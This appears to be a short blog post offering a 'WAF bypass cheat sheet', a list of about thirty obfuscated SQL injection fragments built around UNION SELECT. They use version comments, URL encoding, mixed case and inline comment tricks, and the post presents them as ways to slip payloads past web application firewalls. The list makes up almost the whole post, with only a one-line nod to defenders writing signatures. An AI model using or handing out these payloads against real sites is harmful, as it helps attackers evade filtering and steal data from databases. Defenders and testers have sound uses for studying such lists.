Hello Friends,
While doing research i found intereting Stuff i.e. cheat sheet of WAF bypass.
Following is the ways to bypass the Web Application Firewall and successfully execute the payload on web server.
Note: Web admin/WAF analyst should create the signature/parsing payload such away that it should block the following payloads also.
It is as follow:
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
REVERSE(noinu)+REVERSE(tceles)
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
union+/*!select*/
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
Your Good comments Encourages me to keep posting Nice Articles so keep Commenting & Sharing
WAF Bypass Cheat Sheet
Reviewed by BlackHat
on
2:56 PM
Rating:
Reviewed by BlackHat
on
2:56 PM
Rating:
No comments:
Post a Comment